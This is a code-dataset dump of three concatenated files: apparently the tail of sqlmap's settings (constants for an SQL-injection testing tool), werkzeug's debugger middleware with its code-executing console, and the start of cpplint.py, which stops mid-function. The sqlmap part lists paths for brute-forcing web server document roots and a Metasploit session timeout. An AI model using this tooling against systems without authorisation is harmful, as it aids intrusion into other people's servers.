GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
# Maximum length of a help part containing switch/option name(s)
MAX_HELP_OPTION_LENGTH = 18
# Maximum number of connection retries (to prevent problems with recursion)
MAX_CONNECT_RETRIES = 100
# Strings for detecting formatting errors
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException")
# Regular expression used for extracting ASP.NET view state values
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
# Regular expression used for extracting ASP.NET event validation values
EVENTVALIDATION_REGEX = r'(?i)(?P<name>__EVENTVALIDATION[^"]*)[^>]+value="(?P<result>[^"]+)'
# Number of rows to generate inside the full union test for limited output (must not be too large, to avoid payload length problems)
LIMITED_ROWS_TEST_NUMBER = 15
# Format used for representing invalid unicode characters
INVALID_UNICODE_CHAR_FORMAT = r"\?%02x"
# Regular expression for SOAP-like POST data
SOAP_RECOGNITION_REGEX = r"(?s)\A(<\?xml[^>]+>)?\s*<([^> ]+)( [^>]+)?>.+</\2.*>\s*\Z"
# Regular expression used for detecting JSON-like POST data
JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
# Regular expression used for detecting multipart POST data
MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
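For illustration only (not part of sqlmap; the sample payloads are made up): classifying POST data with the recognition regexes above.

```python
# Illustrative sketch: recognizing JSON-like and multipart POST data.
import re

JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="

assert re.search(JSON_RECOGNITION_REGEX, '{"id": 1, "name": "foo"}')
assert re.search(MULTIPART_RECOGNITION_REGEX, 'Content-Disposition: form-data; name="file"')
assert not re.search(JSON_RECOGNITION_REGEX, "id=1&name=foo")
```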
# Default POST data content-type
DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
# Raw text POST data content-type
PLAIN_TEXT_CONTENT_TYPE = "text/plain; charset=utf-8"
# Length used while checking for existence of Suhosin-patch (like) protection mechanism
SUHOSIN_MAX_VALUE_LENGTH = 512
# Minimum size of a (binary) entry before it can be considered for dumping to disk
MIN_BINARY_DISK_DUMP_SIZE = 100
# Regular expression used for extracting form tags
FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"
# Minimum field entry length needed for encoded content (hex, base64,...) check
MIN_ENCODED_LEN_CHECK = 5
# Timeout in seconds in which Metasploit remote session has to be initialized
METASPLOIT_SESSION_TIMEOUT = 180
# Reference: http://www.cookiecentral.com/faq/#3.5
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
# Prefixes used in brute force search for web server document root
BRUTE_DOC_ROOT_PREFIXES = {
OS.LINUX: ("/var/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
OS.WINDOWS: ("/xampp", "/Program Files/xampp/", "/wamp", "/Program Files/wampp/", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%")
}
# Suffixes used in brute force search for web server document root
BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "sites/all", "www/build")
# String used for marking target name inside used brute force web server document root
BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
# Character used as a boundary in kb.chars (preferably less frequent letter)
KB_CHARS_BOUNDARY_CHAR = 'q'
# CSS style used in HTML dump format
HTML_DUMP_CSS_STYLE = """<style>
table{
margin:10;
background-color:#FFFFFF;
font-family:verdana;
font-size:12px;
align:center;
}
thead{
font-weight:bold;
background-color:#4F81BD;
color:#FFFFFF;
}
tr:nth-child(even) {
background-color: #D3DFEE
}
td{
font-size:10px;
}
th{
font-size:10px;
}
</style>"""
| gpl-2.0 |
Konbonix/DisasterSupplyTracker | lib/werkzeug/debug/__init__.py | 81 | 7867 | # -*- coding: utf-8 -*-
"""
werkzeug.debug
~~~~~~~~~~~~~~
WSGI application traceback debugger.
:copyright: (c) 2011 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import mimetypes
from os.path import join, dirname, basename, isfile
from werkzeug.wrappers import BaseRequest as Request, BaseResponse as Response
from werkzeug.debug.tbtools import get_current_traceback, render_console_html
from werkzeug.debug.console import Console
from werkzeug.security import gen_salt
#: import this here because it once was documented as being available
#: from this module. In case there are users left ...
from werkzeug.debug.repr import debug_repr
class _ConsoleFrame(object):
"""Helper class so that we can reuse the frame console code for the
standalone console.
"""
def __init__(self, namespace):
self.console = Console(namespace)
self.id = 0
class DebuggedApplication(object):
"""Enables debugging support for a given application::
from werkzeug.debug import DebuggedApplication
from myapp import app
app = DebuggedApplication(app, evalex=True)
The `evalex` keyword argument allows evaluating expressions in a
traceback's frame context.
.. versionadded:: 0.7
The `lodgeit_url` parameter was added.
:param app: the WSGI application to run debugged.
:param evalex: enable exception evaluation feature (interactive
debugging). This requires a non-forking server.
    :param request_key: The key that points to the request object in the
environment. This parameter is ignored in current
versions.
:param console_path: the URL for a general purpose console.
:param console_init_func: the function that is executed before starting
the general purpose console. The return value
is used as initial namespace.
:param show_hidden_frames: by default hidden traceback frames are skipped.
You can show them by setting this parameter
to `True`.
:param lodgeit_url: the base URL of the LodgeIt instance to use for
pasting tracebacks.
"""
# this class is public
__module__ = 'werkzeug'
def __init__(self, app, evalex=False, request_key='werkzeug.request',
console_path='/console', console_init_func=None,
show_hidden_frames=False,
lodgeit_url='http://paste.pocoo.org/'):
if not console_init_func:
console_init_func = dict
self.app = app
self.evalex = evalex
self.frames = {}
self.tracebacks = {}
self.request_key = request_key
self.console_path = console_path
self.console_init_func = console_init_func
self.show_hidden_frames = show_hidden_frames
self.lodgeit_url = lodgeit_url
self.secret = gen_salt(20)
def debug_application(self, environ, start_response):
"""Run the application and conserve the traceback frames."""
app_iter = None
try:
app_iter = self.app(environ, start_response)
for item in app_iter:
yield item
if hasattr(app_iter, 'close'):
app_iter.close()
except Exception:
if hasattr(app_iter, 'close'):
app_iter.close()
traceback = get_current_traceback(skip=1, show_hidden_frames=
self.show_hidden_frames,
ignore_system_exceptions=True)
for frame in traceback.frames:
self.frames[frame.id] = frame
self.tracebacks[traceback.id] = traceback
try:
start_response('500 INTERNAL SERVER ERROR', [
('Content-Type', 'text/html; charset=utf-8')
])
except Exception:
# if we end up here there has been output but an error
# occurred. in that situation we can do nothing fancy any
# more, better log something into the error log and fall
# back gracefully.
environ['wsgi.errors'].write(
'Debugging middleware caught exception in streamed '
'response at a point where response headers were already '
'sent.\n')
else:
yield traceback.render_full(evalex=self.evalex,
lodgeit_url=self.lodgeit_url,
secret=self.secret) \
.encode('utf-8', 'replace')
traceback.log(environ['wsgi.errors'])
def execute_command(self, request, command, frame):
"""Execute a command in a console."""
return Response(frame.console.eval(command), mimetype='text/html')
def display_console(self, request):
"""Display a standalone shell."""
if 0 not in self.frames:
self.frames[0] = _ConsoleFrame(self.console_init_func())
return Response(render_console_html(secret=self.secret),
mimetype='text/html')
def paste_traceback(self, request, traceback):
"""Paste the traceback and return a JSON response."""
paste_id = traceback.paste(self.lodgeit_url)
return Response('{"url": "%sshow/%s/", "id": "%s"}'
% (self.lodgeit_url, paste_id, paste_id),
mimetype='application/json')
def get_source(self, request, frame):
"""Render the source viewer."""
return Response(frame.render_source(), mimetype='text/html')
def get_resource(self, request, filename):
"""Return a static resource from the shared folder."""
filename = join(dirname(__file__), 'shared', basename(filename))
if isfile(filename):
mimetype = mimetypes.guess_type(filename)[0] \
or 'application/octet-stream'
            f = open(filename, 'rb')
try:
return Response(f.read(), mimetype=mimetype)
finally:
f.close()
return Response('Not Found', status=404)
def __call__(self, environ, start_response):
"""Dispatch the requests."""
# important: don't ever access a function here that reads the incoming
# form data! Otherwise the application won't have access to that data
# any more!
request = Request(environ)
response = self.debug_application
if request.args.get('__debugger__') == 'yes':
cmd = request.args.get('cmd')
arg = request.args.get('f')
secret = request.args.get('s')
traceback = self.tracebacks.get(request.args.get('tb', type=int))
frame = self.frames.get(request.args.get('frm', type=int))
if cmd == 'resource' and arg:
response = self.get_resource(request, arg)
elif cmd == 'paste' and traceback is not None and \
secret == self.secret:
response = self.paste_traceback(request, traceback)
elif cmd == 'source' and frame and self.secret == secret:
response = self.get_source(request, frame)
elif self.evalex and cmd is not None and frame is not None and \
self.secret == secret:
response = self.execute_command(request, cmd, frame)
elif self.evalex and self.console_path is not None and \
request.path == self.console_path:
response = self.display_console(request)
return response(environ, start_response)
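`DebuggedApplication` follows the standard WSGI middleware pattern. A minimal stdlib-only sketch of the same idea (this stand-in is not part of werkzeug): wrap the application, and turn uncaught exceptions into a 500 response carrying the traceback.

```python
# Minimal stand-in for the middleware pattern used by DebuggedApplication:
# call the wrapped app and turn uncaught exceptions into a 500 response.
import traceback

def failing_app(environ, start_response):
    raise RuntimeError("boom")

def debugged(app):
    def middleware(environ, start_response):
        try:
            return app(environ, start_response)
        except Exception:
            start_response('500 INTERNAL SERVER ERROR',
                           [('Content-Type', 'text/plain')])
            return [traceback.format_exc().encode('utf-8')]
    return middleware

wrapped = debugged(failing_app)
body = b"".join(wrapped({}, lambda status, headers: None))
assert b"RuntimeError: boom" in body
```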
| apache-2.0 |
Pulfer/clementine-vkservice | dist/cpplint.py | 23 | 158902 | #!/usr/bin/python
#
# Copyright (c) 2009 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Here are some issues that I've had people identify in my code during reviews,
# that I think are possible to flag automatically in a lint tool. If these were
# caught by lint, it would save time both for myself and that of my reviewers.
# Most likely, some of these are beyond the scope of the current lint framework,
# but I think it is valuable to retain these wish-list items even if they cannot
# be immediately implemented.
#
# Suggestions
# -----------
# - Check for no 'explicit' for multi-arg ctor
# - Check for boolean assign RHS in parens
# - Check for ctor initializer-list colon position and spacing
# - Check that if there's a ctor, there should be a dtor
# - Check accessors that return non-pointer member variables are
# declared const
# - Check accessors that return non-const pointer member vars are
# *not* declared const
# - Check for using public includes for testing
# - Check for spaces between brackets in one-line inline method
# - Check for no assert()
# - Check for spaces surrounding operators
# - Check for 0 in pointer context (should be NULL)
# - Check for 0 in char context (should be '\0')
# - Check for camel-case method name conventions for methods
# that are not simple inline getters and setters
# - Do not indent namespace contents
# - Avoid inlining non-trivial constructors in header files
# - Check for old-school (void) cast for call-sites of functions
# ignored return value
# - Check gUnit usage of anonymous namespace
# - Check for class declaration order (typedefs, consts, enums,
# ctor(s?), dtor, friend declarations, methods, member vars)
#
"""Does google-lint on c++ files.
The goal of this script is to identify places in the code that *may*
be in non-compliance with google style. It does not attempt to fix
up these problems -- the point is to educate. It also does not
attempt to find all problems, or to ensure that everything it does
find is legitimately a problem.
In particular, we can get very confused by /* and // inside strings!
We do a small hack, which is to ignore //'s with "'s after them on the
same line, but it is far from perfect (in either direction).
"""
import codecs
import copy
import getopt
import math # for log
import os
import re
import sre_compile
import string
import sys
import unicodedata
_USAGE = """
Syntax: cpplint.py [--verbose=#] [--output=vs7] [--filter=-x,+y,...]
[--counting=total|toplevel|detailed]
<file> [file] ...
The style guidelines this tries to follow are those in
http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml
Every problem is given a confidence score from 1-5, with 5 meaning we are
certain of the problem, and 1 meaning it could be a legitimate construct.
This will miss some errors, and is not a substitute for a code review.
To suppress false-positive errors of a certain category, add a
'NOLINT(category)' comment to the line. NOLINT or NOLINT(*)
suppresses errors of all categories on that line.
The files passed in will be linted; at least one file must be provided.
Linted extensions are .cc, .cpp, and .h. Other file types will be ignored.
Flags:
output=vs7
By default, the output is formatted to ease emacs parsing. Visual Studio
compatible output (vs7) may also be used. Other formats are unsupported.
verbose=#
Specify a number 0-5 to restrict errors to certain verbosity levels.
filter=-x,+y,...
Specify a comma-separated list of category-filters to apply: only
error messages whose category names pass the filters will be printed.
(Category names are printed with the message and look like
"[whitespace/indent]".) Filters are evaluated left to right.
"-FOO" and "FOO" means "do not print categories that start with FOO".
"+FOO" means "do print categories that start with FOO".
Examples: --filter=-whitespace,+whitespace/braces
--filter=whitespace,runtime/printf,+runtime/printf_format
--filter=-,+build/include_what_you_use
To see a list of all the categories used in cpplint, pass no arg:
--filter=
counting=total|toplevel|detailed
The total number of errors found is always printed. If
'toplevel' is provided, then the count of errors in each of
the top-level categories like 'build' and 'whitespace' will
also be printed. If 'detailed' is provided, then a count
is provided for each category like 'build/class'.
root=subdir
The root directory used for deriving header guard CPP variable.
By default, the header guard CPP variable is calculated as the relative
path to the directory that contains .git, .hg, or .svn. When this flag
is specified, the relative path is calculated from the specified
directory. If the specified directory does not exist, this flag is
ignored.
Examples:
    Assuming that src/.git exists, the header guard CPP variables for
src/chrome/browser/ui/browser.h are:
No flag => CHROME_BROWSER_UI_BROWSER_H_
--root=chrome => BROWSER_UI_BROWSER_H_
--root=chrome/browser => UI_BROWSER_H_
"""
# We categorize each error message we print. Here are the categories.
# We want an explicit list so we can list them all in cpplint --filter=.
# If you add a new error message with a new category, add it to the list
# here! cpplint_unittest.py should tell you if you forget to do this.
# \ used for clearer layout -- pylint: disable-msg=C6013
_ERROR_CATEGORIES = [
'build/class',
'build/deprecated',
'build/endif_comment',
'build/explicit_make_pair',
'build/forward_decl',
'build/header_guard',
'build/include',
'build/include_alpha',
'build/include_order',
'build/include_what_you_use',
'build/namespaces',
'build/printf_format',
'build/storage_class',
'legal/copyright',
'readability/alt_tokens',
'readability/braces',
'readability/casting',
'readability/check',
'readability/constructors',
'readability/fn_size',
'readability/function',
'readability/multiline_comment',
'readability/multiline_string',
'readability/namespace',
'readability/nolint',
'readability/streams',
'readability/todo',
'readability/utf8',
'runtime/arrays',
'runtime/casting',
'runtime/explicit',
'runtime/int',
'runtime/init',
'runtime/invalid_increment',
'runtime/member_string_references',
'runtime/memset',
'runtime/operator',
'runtime/printf',
'runtime/printf_format',
'runtime/references',
'runtime/rtti',
'runtime/sizeof',
'runtime/string',
'runtime/threadsafe_fn',
'whitespace/blank_line',
'whitespace/braces',
'whitespace/comma',
'whitespace/comments',
'whitespace/empty_loop_body',
'whitespace/end_of_line',
'whitespace/ending_newline',
'whitespace/forcolon',
'whitespace/indent',
'whitespace/labels',
'whitespace/line_length',
'whitespace/newline',
'whitespace/operators',
'whitespace/parens',
'whitespace/semicolon',
'whitespace/tab',
'whitespace/todo'
]
# The default state of the category filter. This is overridden by the --filter=
# flag. By default all errors are on, so only add here categories that should be
# off by default (i.e., categories that must be enabled by the --filter= flags).
# All entries here should start with a '-' or '+', as in the --filter= flag.
_DEFAULT_FILTERS = ['-build/include_alpha']
# We used to check for high-bit characters, but after much discussion we
# decided those were OK, as long as they were in UTF-8 and didn't represent
# hard-coded international strings, which belong in a separate i18n file.
# Headers that we consider STL headers.
_STL_HEADERS = frozenset([
'algobase.h', 'algorithm', 'alloc.h', 'bitset', 'deque', 'exception',
'function.h', 'functional', 'hash_map', 'hash_map.h', 'hash_set',
'hash_set.h', 'iterator', 'list', 'list.h', 'map', 'memory', 'new',
'pair.h', 'pthread_alloc', 'queue', 'set', 'set.h', 'sstream', 'stack',
'stl_alloc.h', 'stl_relops.h', 'type_traits.h',
'utility', 'vector', 'vector.h',
])
# Non-STL C++ system headers.
_CPP_HEADERS = frozenset([
'algo.h', 'builtinbuf.h', 'bvector.h', 'cassert', 'cctype',
'cerrno', 'cfloat', 'ciso646', 'climits', 'clocale', 'cmath',
'complex', 'complex.h', 'csetjmp', 'csignal', 'cstdarg', 'cstddef',
'cstdio', 'cstdlib', 'cstring', 'ctime', 'cwchar', 'cwctype',
'defalloc.h', 'deque.h', 'editbuf.h', 'exception', 'fstream',
'fstream.h', 'hashtable.h', 'heap.h', 'indstream.h', 'iomanip',
'iomanip.h', 'ios', 'iosfwd', 'iostream', 'iostream.h', 'istream',
'istream.h', 'iterator.h', 'limits', 'map.h', 'multimap.h', 'multiset.h',
'numeric', 'ostream', 'ostream.h', 'parsestream.h', 'pfstream.h',
'PlotFile.h', 'procbuf.h', 'pthread_alloc.h', 'rope', 'rope.h',
'ropeimpl.h', 'SFile.h', 'slist', 'slist.h', 'stack.h', 'stdexcept',
'stdiostream.h', 'streambuf', 'streambuf.h', 'stream.h', 'strfile.h',
'string', 'strstream', 'strstream.h', 'tempbuf.h', 'tree.h', 'typeinfo',
'valarray',
])
# Assertion macros. These are defined in base/logging.h and
# testing/base/gunit.h. Note that the _M versions need to come first
# for substring matching to work.
_CHECK_MACROS = [
'DCHECK', 'CHECK',
'EXPECT_TRUE_M', 'EXPECT_TRUE',
'ASSERT_TRUE_M', 'ASSERT_TRUE',
'EXPECT_FALSE_M', 'EXPECT_FALSE',
'ASSERT_FALSE_M', 'ASSERT_FALSE',
]
# Replacement macros for CHECK/DCHECK/EXPECT_TRUE/EXPECT_FALSE
_CHECK_REPLACEMENT = dict([(m, {}) for m in _CHECK_MACROS])
for op, replacement in [('==', 'EQ'), ('!=', 'NE'),
('>=', 'GE'), ('>', 'GT'),
('<=', 'LE'), ('<', 'LT')]:
_CHECK_REPLACEMENT['DCHECK'][op] = 'DCHECK_%s' % replacement
_CHECK_REPLACEMENT['CHECK'][op] = 'CHECK_%s' % replacement
_CHECK_REPLACEMENT['EXPECT_TRUE'][op] = 'EXPECT_%s' % replacement
_CHECK_REPLACEMENT['ASSERT_TRUE'][op] = 'ASSERT_%s' % replacement
_CHECK_REPLACEMENT['EXPECT_TRUE_M'][op] = 'EXPECT_%s_M' % replacement
_CHECK_REPLACEMENT['ASSERT_TRUE_M'][op] = 'ASSERT_%s_M' % replacement
for op, inv_replacement in [('==', 'NE'), ('!=', 'EQ'),
('>=', 'LT'), ('>', 'LE'),
('<=', 'GT'), ('<', 'GE')]:
_CHECK_REPLACEMENT['EXPECT_FALSE'][op] = 'EXPECT_%s' % inv_replacement
_CHECK_REPLACEMENT['ASSERT_FALSE'][op] = 'ASSERT_%s' % inv_replacement
_CHECK_REPLACEMENT['EXPECT_FALSE_M'][op] = 'EXPECT_%s_M' % inv_replacement
_CHECK_REPLACEMENT['ASSERT_FALSE_M'][op] = 'ASSERT_%s_M' % inv_replacement
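The tables built above can be exercised with a minimal standalone lookup. This is a sketch, not part of cpplint itself; the `suggest` helper is hypothetical and just re-derives the same macro names from the operator tables:

```python
# Standalone sketch of the replacement tables above: given a check macro
# and a comparison operator, return the two-argument macro that cpplint
# would suggest instead.
ops = {'==': 'EQ', '!=': 'NE', '>=': 'GE', '>': 'GT', '<=': 'LE', '<': 'LT'}
inv = {'==': 'NE', '!=': 'EQ', '>=': 'LT', '>': 'LE', '<=': 'GT', '<': 'GE'}

def suggest(macro, op):
    """Hypothetical helper mirroring the _CHECK_REPLACEMENT lookup."""
    if macro in ('CHECK', 'DCHECK'):
        return '%s_%s' % (macro, ops[op])
    prefix, kind = macro.split('_', 1)       # e.g. 'EXPECT', 'TRUE_M'
    # EXPECT/ASSERT_FALSE variants invert the comparison.
    table = ops if kind.startswith('TRUE') else inv
    suffix = '_M' if kind.endswith('_M') else ''
    return '%s_%s%s' % (prefix, table[op], suffix)
```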
# Alternative tokens and their replacements. For full list, see section 2.5
# Alternative tokens [lex.digraph] in the C++ standard.
#
# Digraphs (such as '%:') are not included here since it's a mess to
# match those on a word boundary.
_ALT_TOKEN_REPLACEMENT = {
'and': '&&',
'bitor': '|',
'or': '||',
'xor': '^',
'compl': '~',
'bitand': '&',
'and_eq': '&=',
'or_eq': '|=',
'xor_eq': '^=',
'not': '!',
'not_eq': '!='
}
# Compile regular expression that matches all the above keywords. The "[ =()]"
# bit is meant to avoid matching these keywords outside of boolean expressions.
#
# False positives include C-style multi-line comments (http://go/nsiut )
# and multi-line strings (http://go/beujw ), but those have always been
# troublesome for cpplint.
_ALT_TOKEN_REPLACEMENT_PATTERN = re.compile(
r'[ =()](' + ('|'.join(_ALT_TOKEN_REPLACEMENT.keys())) + r')(?=[ (]|$)')
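The delimiter trick in the pattern above can be seen in a small standalone sketch (not part of cpplint; the reduced `alt_tokens` dict and the `find_alt_tokens` helper are illustrative only). The leading `[ =()]` requires a delimiter before the keyword and the `(?=[ (]|$)` lookahead requires one after, so identifiers that merely contain a keyword are not matched:

```python
import re

# Reduced version of _ALT_TOKEN_REPLACEMENT and its pattern.
alt_tokens = {'and': '&&', 'or': '||', 'not': '!', 'not_eq': '!='}
pattern = re.compile(
    r'[ =()](' + '|'.join(alt_tokens.keys()) + r')(?=[ (]|$)')

def find_alt_tokens(line):
    """Return the alternative tokens flagged on one line of C++."""
    return [m.group(1) for m in pattern.finditer(line)]
```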
# These constants define types of headers for use with
# _IncludeState.CheckNextIncludeOrder().
_C_SYS_HEADER = 1
_CPP_SYS_HEADER = 2
_LIKELY_MY_HEADER = 3
_POSSIBLE_MY_HEADER = 4
_OTHER_HEADER = 5
# These constants define the current inline assembly state
_NO_ASM = 0 # Outside of inline assembly block
_INSIDE_ASM = 1 # Inside inline assembly block
_END_ASM = 2 # Last line of inline assembly block
_BLOCK_ASM = 3 # The whole block is an inline assembly block
# Match start of assembly blocks
_MATCH_ASM = re.compile(r'^\s*(?:asm|_asm|__asm|__asm__)'
r'(?:\s+(volatile|__volatile__))?'
r'\s*[{(]')
_regexp_compile_cache = {}
# Finds occurrences of NOLINT or NOLINT(...).
_RE_SUPPRESSION = re.compile(r'\bNOLINT\b(\([^)]*\))?')
# {str, set(int)}: a map from error categories to sets of linenumbers
# on which those errors are expected and should be suppressed.
_error_suppressions = {}
# The root directory used for deriving header guard CPP variable.
# This is set by --root flag.
_root = None
def ParseNolintSuppressions(filename, raw_line, linenum, error):
"""Updates the global list of error-suppressions.
Parses any NOLINT comments on the current line, updating the global
error_suppressions store. Reports an error if the NOLINT comment
was malformed.
Args:
filename: str, the name of the input file.
raw_line: str, the line of input text, with comments.
linenum: int, the number of the current line.
error: function, an error handler.
"""
# FIXME(adonovan): "NOLINT(" is misparsed as NOLINT(*).
matched = _RE_SUPPRESSION.search(raw_line)
if matched:
category = matched.group(1)
if category in (None, '(*)'): # => "suppress all"
_error_suppressions.setdefault(None, set()).add(linenum)
else:
if category.startswith('(') and category.endswith(')'):
category = category[1:-1]
if category in _ERROR_CATEGORIES:
_error_suppressions.setdefault(category, set()).add(linenum)
else:
error(filename, linenum, 'readability/nolint', 5,
'Unknown NOLINT error category: %s' % category)
def ResetNolintSuppressions():
"Resets the set of NOLINT suppressions to empty."
_error_suppressions.clear()
def IsErrorSuppressedByNolint(category, linenum):
"""Returns true if the specified error category is suppressed on this line.
Consults the global error_suppressions map populated by
ParseNolintSuppressions/ResetNolintSuppressions.
Args:
category: str, the category of the error.
linenum: int, the current line number.
Returns:
bool, True iff the error should be suppressed due to a NOLINT comment.
"""
return (linenum in _error_suppressions.get(category, set()) or
linenum in _error_suppressions.get(None, set()))
def Match(pattern, s):
"""Matches the string with the pattern, caching the compiled regexp."""
# The regexp compilation caching is inlined in both Match and Search for
# performance reasons; factoring it out into a separate function turns out
# to be noticeably expensive.
  if pattern not in _regexp_compile_cache:
_regexp_compile_cache[pattern] = sre_compile.compile(pattern)
return _regexp_compile_cache[pattern].match(s)
def Search(pattern, s):
"""Searches the string for the pattern, caching the compiled regexp."""
  if pattern not in _regexp_compile_cache:
_regexp_compile_cache[pattern] = sre_compile.compile(pattern)
return _regexp_compile_cache[pattern].search(s)
class _IncludeState(dict):
"""Tracks line numbers for includes, and the order in which includes appear.
As a dict, an _IncludeState object serves as a mapping between include
filename and line number on which that file was included.
Call CheckNextIncludeOrder() once for each header in the file, passing
in the type constants defined above. Calls in an illegal order will
raise an _IncludeError with an appropriate error message.
"""
# self._section will move monotonically through this set. If it ever
# needs to move backwards, CheckNextIncludeOrder will raise an error.
_INITIAL_SECTION = 0
_MY_H_SECTION = 1
_C_SECTION = 2
_CPP_SECTION = 3
_OTHER_H_SECTION = 4
_TYPE_NAMES = {
_C_SYS_HEADER: 'C system header',
_CPP_SYS_HEADER: 'C++ system header',
_LIKELY_MY_HEADER: 'header this file implements',
_POSSIBLE_MY_HEADER: 'header this file may implement',
_OTHER_HEADER: 'other header',
}
_SECTION_NAMES = {
_INITIAL_SECTION: "... nothing. (This can't be an error.)",
_MY_H_SECTION: 'a header this file implements',
_C_SECTION: 'C system header',
_CPP_SECTION: 'C++ system header',
_OTHER_H_SECTION: 'other header',
}
def __init__(self):
dict.__init__(self)
    # The current section, one of the *_SECTION constants above.
self._section = self._INITIAL_SECTION
# The path of last found header.
self._last_header = ''
def CanonicalizeAlphabeticalOrder(self, header_path):
"""Returns a path canonicalized for alphabetical comparison.
- replaces "-" with "_" so they both cmp the same.
- removes '-inl' since we don't require them to be after the main header.
- lowercase everything, just in case.
Args:
header_path: Path to be canonicalized.
Returns:
Canonicalized path.
"""
return header_path.replace('-inl.h', '.h').replace('-', '_').lower()
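The canonicalization above is a pure string transform; a standalone sketch (the free-standing `canonicalize` helper is illustrative, not cpplint API) shows why `foo-inl.h` sorts together with `foo.h`:

```python
# Mirror of CanonicalizeAlphabeticalOrder: drop the '-inl' suffix, map
# '-' to '_' so both compare identically, and lowercase for safety.
def canonicalize(header_path):
    return header_path.replace('-inl.h', '.h').replace('-', '_').lower()
```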
def IsInAlphabeticalOrder(self, header_path):
"""Check if a header is in alphabetical order with the previous header.
Args:
header_path: Header to be checked.
Returns:
Returns true if the header is in alphabetical order.
"""
canonical_header = self.CanonicalizeAlphabeticalOrder(header_path)
if self._last_header > canonical_header:
return False
self._last_header = canonical_header
return True
def CheckNextIncludeOrder(self, header_type):
"""Returns a non-empty error message if the next header is out of order.
This function also updates the internal state to be ready to check
the next include.
Args:
header_type: One of the _XXX_HEADER constants defined above.
Returns:
The empty string if the header is in the right order, or an
error message describing what's wrong.
"""
error_message = ('Found %s after %s' %
(self._TYPE_NAMES[header_type],
self._SECTION_NAMES[self._section]))
last_section = self._section
if header_type == _C_SYS_HEADER:
if self._section <= self._C_SECTION:
self._section = self._C_SECTION
else:
self._last_header = ''
return error_message
elif header_type == _CPP_SYS_HEADER:
if self._section <= self._CPP_SECTION:
self._section = self._CPP_SECTION
else:
self._last_header = ''
return error_message
elif header_type == _LIKELY_MY_HEADER:
if self._section <= self._MY_H_SECTION:
self._section = self._MY_H_SECTION
else:
self._section = self._OTHER_H_SECTION
elif header_type == _POSSIBLE_MY_HEADER:
if self._section <= self._MY_H_SECTION:
self._section = self._MY_H_SECTION
else:
# This will always be the fallback because we're not sure
# enough that the header is associated with this file.
self._section = self._OTHER_H_SECTION
else:
assert header_type == _OTHER_HEADER
self._section = self._OTHER_H_SECTION
if last_section != self._section:
self._last_header = ''
return ''
class _CppLintState(object):
"""Maintains module-wide state.."""
def __init__(self):
self.verbose_level = 1 # global setting.
self.error_count = 0 # global count of reported errors
# filters to apply when emitting error messages
self.filters = _DEFAULT_FILTERS[:]
self.counting = 'total' # In what way are we counting errors?
self.errors_by_category = {} # string to int dict storing error counts
# output format:
# "emacs" - format that emacs can parse (default)
# "vs7" - format that Microsoft Visual Studio 7 can parse
self.output_format = 'emacs'
def SetOutputFormat(self, output_format):
"""Sets the output format for errors."""
self.output_format = output_format
def SetVerboseLevel(self, level):
"""Sets the module's verbosity, and returns the previous setting."""
last_verbose_level = self.verbose_level
self.verbose_level = level
return last_verbose_level
def SetCountingStyle(self, counting_style):
"""Sets the module's counting options."""
self.counting = counting_style
def SetFilters(self, filters):
"""Sets the error-message filters.
These filters are applied when deciding whether to emit a given
error message.
Args:
filters: A string of comma-separated filters (eg "+whitespace/indent").
Each filter should start with + or -; else we die.
Raises:
ValueError: The comma-separated filters did not all start with '+' or '-'.
E.g. "-,+whitespace,-whitespace/indent,whitespace/badfilter"
"""
# Default filters always have less priority than the flag ones.
self.filters = _DEFAULT_FILTERS[:]
for filt in filters.split(','):
clean_filt = filt.strip()
if clean_filt:
self.filters.append(clean_filt)
for filt in self.filters:
